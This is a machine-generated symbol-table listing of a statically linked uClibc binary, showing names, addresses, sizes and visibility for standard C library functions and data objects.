                                            _L_lock_209.symtab0x804fcdc16FUNC<unknown>DEFAULT2
                                            _L_lock_27.symtab0x805305416FUNC<unknown>DEFAULT2
                                            _L_lock_29.symtab0x8054e4b16FUNC<unknown>DEFAULT2
                                            _L_lock_32.symtab0x8054b2510FUNC<unknown>DEFAULT2
                                            _L_lock_34.symtab0x80559a613FUNC<unknown>DEFAULT2
                                            _L_lock_54.symtab0x80540f516FUNC<unknown>DEFAULT2
                                            _L_lock_70.symtab0x8052f5416FUNC<unknown>DEFAULT2
                                            _L_unlock_101.symtab0x80559b310FUNC<unknown>DEFAULT2
                                            _L_unlock_102.symtab0x8054e6b16FUNC<unknown>DEFAULT2
                                            _L_unlock_113.symtab0x805413213FUNC<unknown>DEFAULT2
                                            _L_unlock_152.symtab0x8054e8b16FUNC<unknown>DEFAULT2
                                            _L_unlock_167.symtab0x8052f6413FUNC<unknown>DEFAULT2
                                            _L_unlock_170.symtab0x8054eab16FUNC<unknown>DEFAULT2
                                            _L_unlock_225.symtab0x804fcec13FUNC<unknown>DEFAULT2
                                            _L_unlock_232.symtab0x8054ec813FUNC<unknown>DEFAULT2
                                            _L_unlock_235.symtab0x804fcf913FUNC<unknown>DEFAULT2
                                            _L_unlock_40.symtab0x8050b4010FUNC<unknown>DEFAULT2
                                            _L_unlock_61.symtab0x8054b2f10FUNC<unknown>DEFAULT2
                                            _L_unlock_66.symtab0x805410516FUNC<unknown>DEFAULT2
                                            _L_unlock_83.symtab0x805411513FUNC<unknown>DEFAULT2
                                            _L_unlock_86.symtab0x8054e5b16FUNC<unknown>DEFAULT2
                                            _L_unlock_90.symtab0x805306413FUNC<unknown>DEFAULT2
                                            _READ.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            _WRITE.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            __CTOR_END__.symtab0x805c6100OBJECT<unknown>DEFAULT7
                                            __CTOR_LIST__.symtab0x805c60c0OBJECT<unknown>DEFAULT7
                                            __C_ctype_b.symtab0x805c8044OBJECT<unknown>DEFAULT11
                                            __C_ctype_b.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            __C_ctype_b_data.symtab0x805a310768OBJECT<unknown>DEFAULT4
                                            __C_ctype_tolower.symtab0x805c80c4OBJECT<unknown>DEFAULT11
                                            __C_ctype_tolower.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            __C_ctype_tolower_data.symtab0x805a610768OBJECT<unknown>DEFAULT4
                                            __C_ctype_toupper.symtab0x805c8144OBJECT<unknown>DEFAULT11
                                            __C_ctype_toupper.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            __C_ctype_toupper_data.symtab0x805a910768OBJECT<unknown>DEFAULT4
                                            __DTOR_END__.symtab0x805c6180OBJECT<unknown>DEFAULT8
                                            __DTOR_LIST__.symtab0x805c6140OBJECT<unknown>DEFAULT8
                                            __EH_FRAME_BEGIN__.symtab0x805c0000OBJECT<unknown>DEFAULT5
                                            __FRAME_END__.symtab0x805c6080OBJECT<unknown>DEFAULT5
                                            __GI___C_ctype_b.symtab0x805c8044OBJECT<unknown>HIDDEN11
                                            __GI___C_ctype_tolower.symtab0x805c80c4OBJECT<unknown>HIDDEN11
                                            __GI___C_ctype_toupper.symtab0x805c8144OBJECT<unknown>HIDDEN11
                                            __GI___close.symtab0x80531d080FUNC<unknown>HIDDEN2
                                            __GI___close_nocancel.symtab0x80531da27FUNC<unknown>HIDDEN2
                                            __GI___ctype_b.symtab0x805c8084OBJECT<unknown>HIDDEN11
                                            __GI___ctype_tolower.symtab0x805c8104OBJECT<unknown>HIDDEN11
                                            __GI___ctype_toupper.symtab0x805c8184OBJECT<unknown>HIDDEN11
                                            __GI___errno_location.symtab0x804f8fc13FUNC<unknown>HIDDEN2
                                            __GI___fcntl_nocancel.symtab0x804f2a483FUNC<unknown>HIDDEN2
                                            __GI___fgetc_unlocked.symtab0x8054ed8204FUNC<unknown>HIDDEN2
                                            __GI___glibc_strerror_r.symtab0x8050e4c26FUNC<unknown>HIDDEN2
                                            __GI___libc_close.symtab0x80531d080FUNC<unknown>HIDDEN2
                                            __GI___libc_fcntl.symtab0x804f2f7153FUNC<unknown>HIDDEN2
                                            __GI___libc_open.symtab0x805322091FUNC<unknown>HIDDEN2
                                            __GI___libc_read.symtab0x80532e091FUNC<unknown>HIDDEN2
                                            __GI___libc_waitpid.symtab0x805334091FUNC<unknown>HIDDEN2
                                            __GI___libc_write.symtab0x805328091FUNC<unknown>HIDDEN2
                                            __GI___open.symtab0x805322091FUNC<unknown>HIDDEN2
                                            __GI___open_nocancel.symtab0x805322a33FUNC<unknown>HIDDEN2
                                            __GI___read.symtab0x80532e091FUNC<unknown>HIDDEN2
                                            __GI___read_nocancel.symtab0x80532ea33FUNC<unknown>HIDDEN2
                                            __GI___register_atfork.symtab0x8052f91195FUNC<unknown>HIDDEN2
                                            __GI___sigaddset.symtab0x805140432FUNC<unknown>HIDDEN2
                                            __GI___sigdelset.symtab0x805142432FUNC<unknown>HIDDEN2
                                            __GI___sigismember.symtab0x80513e036FUNC<unknown>HIDDEN2
                                            __GI___uClibc_fini.symtab0x805347356FUNC<unknown>HIDDEN2
                                            __GI___uClibc_init.symtab0x80534d739FUNC<unknown>HIDDEN2
                                            __GI___waitpid.symtab0x805334091FUNC<unknown>HIDDEN2
                                            __GI___write.symtab0x805328091FUNC<unknown>HIDDEN2
                                            __GI___write_nocancel.symtab0x805328a33FUNC<unknown>HIDDEN2
                                            __GI___xpg_strerror_r.symtab0x8050e68191FUNC<unknown>HIDDEN2
                                            __GI__exit.symtab0x804f39066FUNC<unknown>HIDDEN2
                                            __GI_abort.symtab0x8052380191FUNC<unknown>HIDDEN2
                                            __GI_atoi.symtab0x80527b017FUNC<unknown>HIDDEN2
                                            __GI_brk.symtab0x805575444FUNC<unknown>HIDDEN2
                                            __GI_close.symtab0x80531d080FUNC<unknown>HIDDEN2
                                            __GI_closedir.symtab0x804f700130FUNC<unknown>HIDDEN2
                                            __GI_config_close.symtab0x8053e3644FUNC<unknown>HIDDEN2
                                            __GI_config_open.symtab0x8053e6244FUNC<unknown>HIDDEN2
                                            __GI_config_read.symtab0x8053bcc618FUNC<unknown>HIDDEN2
                                            __GI_connect.symtab0x805107c84FUNC<unknown>HIDDEN2
                                            __GI_dup2.symtab0x804f40043FUNC<unknown>HIDDEN2
                                            __GI_execl.symtab0x8052954101FUNC<unknown>HIDDEN2
                                            __GI_execve.symtab0x805385447FUNC<unknown>HIDDEN2
                                            __GI_exit.symtab0x80528f493FUNC<unknown>HIDDEN2
                                            __GI_fclose.symtab0x8053f6c380FUNC<unknown>HIDDEN2
                                            __GI_fcntl.symtab0x804f2f7153FUNC<unknown>HIDDEN2
                                            __GI_fflush_unlocked.symtab0x8054c7c447FUNC<unknown>HIDDEN2
                                            __GI_fgetc.symtab0x8054a94145FUNC<unknown>HIDDEN2
                                            __GI_fgetc_unlocked.symtab0x8054ed8204FUNC<unknown>HIDDEN2
                                            __GI_fgets.symtab0x8050ac0118FUNC<unknown>HIDDEN2
                                            __GI_fgets_unlocked.symtab0x8050b4c94FUNC<unknown>HIDDEN2
                                            __GI_fopen.symtab0x804f93021FUNC<unknown>HIDDEN2
                                            __GI_fork.symtab0x8052d48524FUNC<unknown>HIDDEN2
                                            __GI_fputs_unlocked.symtab0x8050bac45FUNC<unknown>HIDDEN2
                                            __GI_fseek.symtab0x805589824FUNC<unknown>HIDDEN2
                                            __GI_fseeko64.symtab0x80558b0246FUNC<unknown>HIDDEN2
                                            __GI_fstat.symtab0x805388470FUNC<unknown>HIDDEN2
                                            __GI_fwrite_unlocked.symtab0x8050bdc111FUNC<unknown>HIDDEN2
                                            __GI_getc_unlocked.symtab0x8054ed8204FUNC<unknown>HIDDEN2
                                            __GI_getdtablesize.symtab0x804f42c32FUNC<unknown>HIDDEN2
                                            __GI_getegid.symtab0x80538cc8FUNC<unknown>HIDDEN2
                                            __GI_geteuid.symtab0x804f44c8FUNC<unknown>HIDDEN2
                                            __GI_getgid.symtab0x80538d48FUNC<unknown>HIDDEN2
                                            __GI_gethostbyname.symtab0x805103014FUNC<unknown>HIDDEN2
                                            __GI_gethostbyname2.symtab0x805104057FUNC<unknown>HIDDEN2
                                            __GI_gethostbyname2_r.symtab0x80551f4666FUNC<unknown>HIDDEN2
                                            __GI_gethostbyname_r.symtab0x8056ce4684FUNC<unknown>HIDDEN2
                                            __GI_gethostname.symtab0x8056f9089FUNC<unknown>HIDDEN2
                                            __GI_getpagesize.symtab0x80538dc19FUNC<unknown>HIDDEN2
                                            __GI_getpid.symtab0x805307449FUNC<unknown>HIDDEN2
                                            __GI_getrlimit.symtab0x804f45c43FUNC<unknown>HIDDEN2
                                            __GI_getsockname.symtab0x80510d040FUNC<unknown>HIDDEN2
                                            __GI_getuid.symtab0x80538f08FUNC<unknown>HIDDEN2
                                            __GI_htonl.symtab0x8050ff47FUNC<unknown>HIDDEN2
                                            __GI_htons.symtab0x8050fe812FUNC<unknown>HIDDEN2
                                            __GI_inet_addr.symtab0x805101031FUNC<unknown>HIDDEN2
                                            __GI_inet_aton.symtab0x8055160148FUNC<unknown>HIDDEN2
                                            __GI_inet_ntop.symtab0x8055eae432FUNC<unknown>HIDDEN2
                                            __GI_inet_pton.symtab0x8055bfb459FUNC<unknown>HIDDEN2
                                            __GI_initstate_r.symtab0x8052673155FUNC<unknown>HIDDEN2
                                            __GI_ioctl.symtab0x804f488139FUNC<unknown>HIDDEN2
                                            __GI_isatty.symtab0x8050f6c27FUNC<unknown>HIDDEN2
                                            __GI_kill.symtab0x804f51443FUNC<unknown>HIDDEN2
                                            __GI_lseek64.symtab0x80570d490FUNC<unknown>HIDDEN2
                                            __GI_memcpy.symtab0x8050c4c41FUNC<unknown>HIDDEN2
                                            __GI_memmove.symtab0x8050c7837FUNC<unknown>HIDDEN2
                                            __GI_mempcpy.symtab0x8055b6430FUNC<unknown>HIDDEN2
                                            __GI_memrchr.symtab0x8054fdc177FUNC<unknown>HIDDEN2
                                            __GI_memset.symtab0x8050ca050FUNC<unknown>HIDDEN2
                                            __GI_mmap.symtab0x80537d427FUNC<unknown>HIDDEN2
                                            __GI_mremap.symtab0x80538f859FUNC<unknown>HIDDEN2
                                            __GI_munmap.symtab0x805393443FUNC<unknown>HIDDEN2
                                            __GI_nanosleep.symtab0x805398961FUNC<unknown>HIDDEN2
                                            __GI_ntohl.symtab0x80510077FUNC<unknown>HIDDEN2
                                            __GI_ntohs.symtab0x8050ffb12FUNC<unknown>HIDDEN2
                                            __GI_open.symtab0x805322091FUNC<unknown>HIDDEN2
                                            __GI_opendir.symtab0x804f80c132FUNC<unknown>HIDDEN2
                                            __GI_pipe.symtab0x804f54039FUNC<unknown>HIDDEN2
                                            __GI_poll.symtab0x805701972FUNC<unknown>HIDDEN2
                                            __GI_raise.symtab0x80530a8100FUNC<unknown>HIDDEN2
                                            __GI_random.symtab0x805244866FUNC<unknown>HIDDEN2
                                            __GI_random_r.symtab0x805257495FUNC<unknown>HIDDEN2
                                            __GI_rawmemchr.symtab0x8055b5019FUNC<unknown>HIDDEN2
                                            __GI_read.symtab0x80532e091FUNC<unknown>HIDDEN2
                                            __GI_readdir64.symtab0x8053b48129FUNC<unknown>HIDDEN2
                                            __GI_recv.symtab0x805113092FUNC<unknown>HIDDEN2
                                            __GI_recvfrom.symtab0x805118c108FUNC<unknown>HIDDEN2
                                            __GI_sbrk.symtab0x80539c864FUNC<unknown>HIDDEN2
                                            __GI_select.symtab0x804f5dd108FUNC<unknown>HIDDEN2
                                            __GI_send.symtab0x80511f892FUNC<unknown>HIDDEN2
                                            __GI_sendto.symtab0x8051254108FUNC<unknown>HIDDEN2
                                            __GI_setsockopt.symtab0x80512c056FUNC<unknown>HIDDEN2
                                            __GI_setstate_r.symtab0x805270e161FUNC<unknown>HIDDEN2
                                            __GI_sigaction.symtab0x805375f80FUNC<unknown>HIDDEN2
                                            __GI_sigaddset.symtab0x805132034FUNC<unknown>HIDDEN2
                                            __GI_sigemptyset.symtab0x805134420FUNC<unknown>HIDDEN2
                                            __GI_signal.symtab0x8051358136FUNC<unknown>HIDDEN2
                                            __GI_sigprocmask.symtab0x804f64c97FUNC<unknown>HIDDEN2
                                            __GI_sleep.symtab0x805310c195FUNC<unknown>HIDDEN2
                                            __GI_snprintf.symtab0x804f94832FUNC<unknown>HIDDEN2
                                            __GI_socket.symtab0x80512f840FUNC<unknown>HIDDEN2
                                            __GI_sprintf.symtab0x804f96830FUNC<unknown>HIDDEN2
                                            __GI_srandom_r.symtab0x80525d3160FUNC<unknown>HIDDEN2
                                            __GI_stat.symtab0x805706470FUNC<unknown>HIDDEN2
                                            __GI_strcasecmp.symtab0x80574e454FUNC<unknown>HIDDEN2
                                            __GI_strchr.symtab0x8050cd430FUNC<unknown>HIDDEN2
                                            __GI_strchrnul.symtab0x8054fa425FUNC<unknown>HIDDEN2
                                            __GI_strcmp.symtab0x8050cf429FUNC<unknown>HIDDEN2
                                            __GI_strcoll.symtab0x8050cf429FUNC<unknown>HIDDEN2
                                            __GI_strcpy.symtab0x8050d1427FUNC<unknown>HIDDEN2
                                            __GI_strcspn.symtab0x805509045FUNC<unknown>HIDDEN2
                                            __GI_strdup.symtab0x805713048FUNC<unknown>HIDDEN2
                                            __GI_strlen.symtab0x8050d3019FUNC<unknown>HIDDEN2
                                            __GI_strncpy.symtab0x8050d4438FUNC<unknown>HIDDEN2
                                            __GI_strnlen.symtab0x8050d6c24FUNC<unknown>HIDDEN2
                                            __GI_strpbrk.symtab0x805513c35FUNC<unknown>HIDDEN2
                                            __GI_strrchr.symtab0x8054fc026FUNC<unknown>HIDDEN2
                                            __GI_strspn.symtab0x80550c042FUNC<unknown>HIDDEN2
                                            __GI_strstr.symtab0x8050d84197FUNC<unknown>HIDDEN2
                                            __GI_strtok.symtab0x8050f5422FUNC<unknown>HIDDEN2
                                            __GI_strtok_r.symtab0x80550ec80FUNC<unknown>HIDDEN2
                                            __GI_strtol.symtab0x80527c423FUNC<unknown>HIDDEN2
                                            __GI_sysconf.symtab0x8052a80523FUNC<unknown>HIDDEN2
                                            __GI_tcgetattr.symtab0x8050f8896FUNC<unknown>HIDDEN2
                                            __GI_time.symtab0x804f6b016FUNC<unknown>HIDDEN2
                                            __GI_times.symtab0x8053a0816FUNC<unknown>HIDDEN2
                                            __GI_tolower.symtab0x804f6c029FUNC<unknown>HIDDEN2
                                            __GI_toupper.symtab0x804f6e029FUNC<unknown>HIDDEN2
                                            __GI_uname.symtab0x80570ac39FUNC<unknown>HIDDEN2
                                            __GI_vfork.symtab0x8052d1056FUNC<unknown>HIDDEN2
                                            __GI_vsnprintf.symtab0x804f988172FUNC<unknown>HIDDEN2
                                            __GI_waitpid.symtab0x805334091FUNC<unknown>HIDDEN2
                                            __GI_wcrtomb.symtab0x8053e9063FUNC<unknown>HIDDEN2
                                            __GI_wcsnrtombs.symtab0x8053eec128FUNC<unknown>HIDDEN2
                                            __GI_wcsrtombs.symtab0x8053ed027FUNC<unknown>HIDDEN2
                                            __GI_write.symtab0x805328091FUNC<unknown>HIDDEN2
                                            __JCR_END__.symtab0x805c61c0OBJECT<unknown>DEFAULT9
                                            __JCR_LIST__.symtab0x805c61c0OBJECT<unknown>DEFAULT9
                                            __app_fini.symtab0x806322c4OBJECT<unknown>HIDDEN12
                                            __atexit_lock.symtab0x805c9e424OBJECT<unknown>DEFAULT11
                                            __bss_start.symtab0x805ca140NOTYPE<unknown>DEFAULTSHN_ABS
                                            __check_one_fd.symtab0x80534ab44FUNC<unknown>DEFAULT2
                                            __close.symtab0x80531d080FUNC<unknown>DEFAULT2
                                            __close_nameservers.symtab0x8056c5896FUNC<unknown>HIDDEN2
                                            __close_nocancel.symtab0x80531da27FUNC<unknown>DEFAULT2
                                            __ctype_b.symtab0x805c8084OBJECT<unknown>DEFAULT11
                                            __ctype_tolower.symtab0x805c8104OBJECT<unknown>DEFAULT11
                                            __ctype_toupper.symtab0x805c8184OBJECT<unknown>DEFAULT11
                                            __curbrk.symtab0x80637704OBJECT<unknown>HIDDEN12
                                            __data_start.symtab0x805c6480NOTYPE<unknown>DEFAULT11
                                            __decode_dotted.symtab0x8056060259FUNC<unknown>HIDDEN2
                                            __decode_header.symtab0x8057218166FUNC<unknown>HIDDEN2
                                            __deregister_frame_info_bases.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                            __dns_lookup.symtab0x80561641842FUNC<unknown>HIDDEN2
                                            __do_global_ctors_aux.symtab0x80575a00FUNC<unknown>DEFAULT2
                                            __do_global_dtors_aux.symtab0x80480e00FUNC<unknown>DEFAULT2
                                            __dso_handle.symtab0x805c6400OBJECT<unknown>HIDDEN11
                                            __encode_dotted.symtab0x805751c130FUNC<unknown>HIDDEN2
                                            __encode_header.symtab0x8057160182FUNC<unknown>HIDDEN2
                                            __encode_question.symtab0x80572c082FUNC<unknown>HIDDEN2
                                            __environ.symtab0x80632244OBJECT<unknown>DEFAULT12
                                            __errno_location.symtab0x804f8fc13FUNC<unknown>DEFAULT2
                                            __errno_location.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            __exit_cleanup.symtab0x8062cd44OBJECT<unknown>HIDDEN12
                                            __fcntl_nocancel.symtab0x804f2a483FUNC<unknown>DEFAULT2
                                            __fgetc_unlocked.symtab0x8054ed8204FUNC<unknown>DEFAULT2
                                            __fini_array_end.symtab0x805c60c0NOTYPE<unknown>HIDDEN6
                                            __fini_array_start.symtab0x805c60c0NOTYPE<unknown>HIDDEN6
                                            __fork.symtab0x8052d48524FUNC<unknown>DEFAULT2
                                            __fork_generation_pointer.symtab0x8063c784OBJECT<unknown>HIDDEN12
                                            __fork_handlers.symtab0x8063c7c4OBJECT<unknown>HIDDEN12
                                            __fork_lock.symtab0x8062cd84OBJECT<unknown>HIDDEN12
                                            __get_hosts_byname_r.symtab0x8056cb841FUNC<unknown>HIDDEN2
                                            __get_pc_thunk_bx.symtab0x80480d00FUNC<unknown>HIDDEN2
                                            __getdents64.symtab0x8055780280FUNC<unknown>HIDDEN2
                                            __getpagesize.symtab0x80538dc19FUNC<unknown>DEFAULT2
                                            __getpid.symtab0x805307449FUNC<unknown>DEFAULT2
                                            __glibc_strerror_r.symtab0x8050e4c26FUNC<unknown>DEFAULT2
                                            __glibc_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            __h_errno_location.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                            __init_array_end.symtab0x805c60c0NOTYPE<unknown>HIDDEN6
                                            __init_array_start.symtab0x805c60c0NOTYPE<unknown>HIDDEN6
                                            __libc_close.symtab0x80531d080FUNC<unknown>DEFAULT2
                                            __libc_connect.symtab0x805107c84FUNC<unknown>DEFAULT2
                                            __libc_disable_asynccancel.symtab0x805339c86FUNC<unknown>HIDDEN2
                                            __libc_enable_asynccancel.symtab0x80533f279FUNC<unknown>HIDDEN2
                                            __libc_errno.symtab0x04TLS<unknown>HIDDEN6
                                            __libc_fcntl.symtab0x804f2f7153FUNC<unknown>DEFAULT2
                                            __libc_fork.symtab0x8052d48524FUNC<unknown>DEFAULT2
                                            __libc_h_errno.symtab0x44TLS<unknown>HIDDEN6
                                            __libc_nanosleep.symtab0x805398961FUNC<unknown>DEFAULT2
                                            __libc_open.symtab0x805322091FUNC<unknown>DEFAULT2
                                            __libc_read.symtab0x80532e091FUNC<unknown>DEFAULT2
                                            __libc_recv.symtab0x805113092FUNC<unknown>DEFAULT2
                                            __libc_recvfrom.symtab0x805118c108FUNC<unknown>DEFAULT2
                                            __libc_select.symtab0x804f5dd108FUNC<unknown>DEFAULT2
                                            __libc_send.symtab0x80511f892FUNC<unknown>DEFAULT2
                                            __libc_sendto.symtab0x8051254108FUNC<unknown>DEFAULT2
                                            __libc_setup_tls.symtab0x80554ea513FUNC<unknown>DEFAULT2
                                            __libc_sigaction.symtab0x805375f80FUNC<unknown>DEFAULT2
                                            __libc_stack_end.symtab0x80632204OBJECT<unknown>DEFAULT12
                                            __libc_waitpid.symtab0x805334091FUNC<unknown>DEFAULT2
                                            __libc_write.symtab0x805328091FUNC<unknown>DEFAULT2
                                            __linkin_atfork.symtab0x8052f7429FUNC<unknown>HIDDEN2
                                            __lll_lock_wait_private.symtab0x8052cc040FUNC<unknown>HIDDEN2
                                            __lll_unlock_wake_private.symtab0x8052cf032FUNC<unknown>HIDDEN2
                                            __local_nameserver.symtab0x805bdc416OBJECT<unknown>HIDDEN4
                                            __malloc_consolidate.symtab0x8052059379FUNC<unknown>HIDDEN2
                                            __malloc_largebin_index.symtab0x805144438FUNC<unknown>DEFAULT2
                                            __malloc_lock.symtab0x805c90824OBJECT<unknown>DEFAULT11
                                            __malloc_state.symtab0x8063900888OBJECT<unknown>DEFAULT12
                                            __malloc_trim.symtab0x8051fdc125FUNC<unknown>DEFAULT2
                                            __nameserver.symtab0x8063cb04OBJECT<unknown>HIDDEN12
                                            __nameservers.symtab0x8063cb44OBJECT<unknown>HIDDEN12
                                            __nptl_deallocate_tsd.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                            __nptl_nthreads.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                            __open.symtab0x805322091FUNC<unknown>DEFAULT2
                                            __open_etc_hosts.symtab0x805731412FUNC<unknown>HIDDEN2
                                            __open_nameservers.symtab0x80568eb876FUNC<unknown>HIDDEN2
                                            __open_nocancel.symtab0x805322a33FUNC<unknown>DEFAULT2
                                            __pagesize.symtab0x80632284OBJECT<unknown>DEFAULT12
                                            __preinit_array_end.symtab0x805c60c0NOTYPE<unknown>HIDDEN6
                                            __preinit_array_start.symtab0x805c60c0NOTYPE<unknown>HIDDEN6
                                            __progname.symtab0x805ca004OBJECT<unknown>DEFAULT11
                                            __progname_full.symtab0x805ca044OBJECT<unknown>DEFAULT11
                                            __pthread_initialize_minimal.symtab0x80556eb15FUNC<unknown>DEFAULT2
                                            __pthread_mutex_init.symtab0x80534473FUNC<unknown>DEFAULT2
                                            __pthread_mutex_lock.symtab0x80534443FUNC<unknown>DEFAULT2
                                            __pthread_mutex_trylock.symtab0x80534443FUNC<unknown>DEFAULT2
                                            __pthread_mutex_unlock.symtab0x80534443FUNC<unknown>DEFAULT2
                                            __pthread_return_0.symtab0x80534443FUNC<unknown>DEFAULT2
                                            __pthread_unwind.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                            __read.symtab0x80532e091FUNC<unknown>DEFAULT2
                                            __read_etc_hosts_r.symtab0x8057320451FUNC<unknown>HIDDEN2
                                            __read_nocancel.symtab0x80532ea33FUNC<unknown>DEFAULT2
                                            __register_atfork.symtab0x8052f91195FUNC<unknown>DEFAULT2
                                            __register_frame_info_bases.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                            __res_sync.symtab0x8063ca84OBJECT<unknown>HIDDEN12
                                            __resolv_attempts.symtab0x805ca111OBJECT<unknown>HIDDEN11
                                            __resolv_lock.symtab0x806377824OBJECT<unknown>DEFAULT12
                                            __resolv_timeout.symtab0x805ca101OBJECT<unknown>HIDDEN11
                                            __restore.symtab0x80537570NOTYPE<unknown>DEFAULT2
                                            __restore_rt.symtab0x80537500NOTYPE<unknown>DEFAULT2
                                            __rtld_fini.symtab0x80632304OBJECT<unknown>HIDDEN12
                                            __searchdomain.symtab0x8063cac4OBJECT<unknown>HIDDEN12
                                            __searchdomains.symtab0x8063cb84OBJECT<unknown>HIDDEN12
                                            __sigaddset.symtab0x805140432FUNC<unknown>DEFAULT2
                                            __sigdelset.symtab0x805142432FUNC<unknown>DEFAULT2
                                            __sigismember.symtab0x80513e036FUNC<unknown>DEFAULT2
                                            __socketcall.symtab0x80537f043FUNC<unknown>HIDDEN2
                                            __socketcall.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            __stdin.symtab0x805c8284OBJECT<unknown>DEFAULT11
                                            __stdio_READ.symtab0x80559c062FUNC<unknown>HIDDEN2
                                            __stdio_WRITE.symtab0x8054140139FUNC<unknown>HIDDEN2
                                            __stdio_adjust_position.symtab0x8055a00154FUNC<unknown>HIDDEN2
                                            __stdio_fwrite.symtab0x80541cc232FUNC<unknown>HIDDEN2
                                            __stdio_rfill.symtab0x8055a9c37FUNC<unknown>HIDDEN2
                                            __stdio_seek.symtab0x8055b2046FUNC<unknown>HIDDEN2
                                            __stdio_trans2r_o.symtab0x8055ac492FUNC<unknown>HIDDEN2
                                            __stdio_trans2w_o.symtab0x80542b4154FUNC<unknown>HIDDEN2
                                            __stdio_wcommit.symtab0x804fe1437FUNC<unknown>HIDDEN2
                                            __stdout.symtab0x805c82c4OBJECT<unknown>DEFAULT11
                                            __syscall_error.symtab0x805374015FUNC<unknown>HIDDEN2
                                            __syscall_error.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            __syscall_fcntl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            __syscall_nanosleep.symtab0x805396041FUNC<unknown>DEFAULT2
                                            __syscall_poll.symtab0x8056fec45FUNC<unknown>DEFAULT2
                                            __syscall_rt_sigaction.symtab0x805381c53FUNC<unknown>DEFAULT2
                                            __syscall_rt_sigaction.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            __syscall_select.symtab0x804f5a457FUNC<unknown>DEFAULT2
                                            __uClibc_fini.symtab0x805347356FUNC<unknown>DEFAULT2
                                            __uClibc_init.symtab0x80534d739FUNC<unknown>DEFAULT2
                                            __uClibc_main.symtab0x80534fe577FUNC<unknown>DEFAULT2
                                            __uClibc_main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            __uclibc_progname.symtab0x805c9fc4OBJECT<unknown>HIDDEN11
                                            __vfork.symtab0x8052d1056FUNC<unknown>HIDDEN2
                                            __waitpid.symtab0x805334091FUNC<unknown>DEFAULT2
                                            __waitpid_nocancel.symtab0x805334a33FUNC<unknown>DEFAULT2
                                            __write.symtab0x805328091FUNC<unknown>DEFAULT2
                                            __write_nocancel.symtab0x805328a33FUNC<unknown>DEFAULT2
                                            __xpg_strerror_r.symtab0x8050e68191FUNC<unknown>DEFAULT2
                                            __xpg_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            __xstat32_conv.symtab0x8053abb138FUNC<unknown>HIDDEN2
                                            __xstat64_conv.symtab0x8053a18163FUNC<unknown>HIDDEN2
                                            _adjust_pos.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            _bss_custom_printf_spec.symtab0x8062af410OBJECT<unknown>DEFAULT12
                                            _charpad.symtab0x804fe3c53FUNC<unknown>DEFAULT2
                                            _cs_funcs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            _custom_printf_arginfo.symtab0x80638a840OBJECT<unknown>HIDDEN12
                                            _custom_printf_handler.symtab0x80638d040OBJECT<unknown>HIDDEN12
                                            _custom_printf_spec.symtab0x805c9044OBJECT<unknown>HIDDEN11
                                            _dl_aux_init.symtab0x80556fc18FUNC<unknown>DEFAULT2
                                            _dl_init_static_tls.symtab0x805ca084OBJECT<unknown>DEFAULT11
                                            _dl_nothread_init_static_tls.symtab0x805570e68FUNC<unknown>HIDDEN2
                                            _dl_phdr.symtab0x8063ca04OBJECT<unknown>DEFAULT12
                                            _dl_phnum.symtab0x8063ca44OBJECT<unknown>DEFAULT12
                                            _dl_tls_dtv_gaps.symtab0x8063c941OBJECT<unknown>DEFAULT12
                                            _dl_tls_dtv_slotinfo_list.symtab0x8063c904OBJECT<unknown>DEFAULT12
                                            _dl_tls_generation.symtab0x8063c984OBJECT<unknown>DEFAULT12
                                            _dl_tls_max_dtv_idx.symtab0x8063c884OBJECT<unknown>DEFAULT12
                                            _dl_tls_setup.symtab0x80554ba48FUNC<unknown>DEFAULT2
                                            _dl_tls_static_align.symtab0x8063c844OBJECT<unknown>DEFAULT12
                                            _dl_tls_static_nelem.symtab0x8063c9c4OBJECT<unknown>DEFAULT12
                                            _dl_tls_static_size.symtab0x8063c8c4OBJECT<unknown>DEFAULT12
                                            _dl_tls_static_used.symtab0x8063c804OBJECT<unknown>DEFAULT12
                                            _edata.symtab0x805ca140NOTYPE<unknown>DEFAULTSHN_ABS
                                            _end.symtab0x8063cbc0NOTYPE<unknown>DEFAULTSHN_ABS
                                            _exit.symtab0x804f39066FUNC<unknown>DEFAULT2
                                            _exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            _fini.symtab0x80575c80FUNC<unknown>DEFAULT3
                                            _fixed_buffers.symtab0x8060af48192OBJECT<unknown>DEFAULT12
                                            _fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            _fp_out_narrow.symtab0x804fe7194FUNC<unknown>DEFAULT2
                                            _fpmaxtostr.symtab0x80544cc1479FUNC<unknown>HIDDEN2
                                            _fpmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            _fwrite.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            _init.symtab0x80480b40FUNC<unknown>DEFAULT1
                                            _load_inttype.symtab0x805435086FUNC<unknown>HIDDEN2
                                            _load_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            _ppfs_init.symtab0x80504cc103FUNC<unknown>HIDDEN2
                                            _ppfs_init.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            _ppfs_parsespec.symtab0x80506b11036FUNC<unknown>HIDDEN2
                                            _ppfs_parsespec.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            _ppfs_prepargs.symtab0x805053457FUNC<unknown>HIDDEN2
                                            _ppfs_prepargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
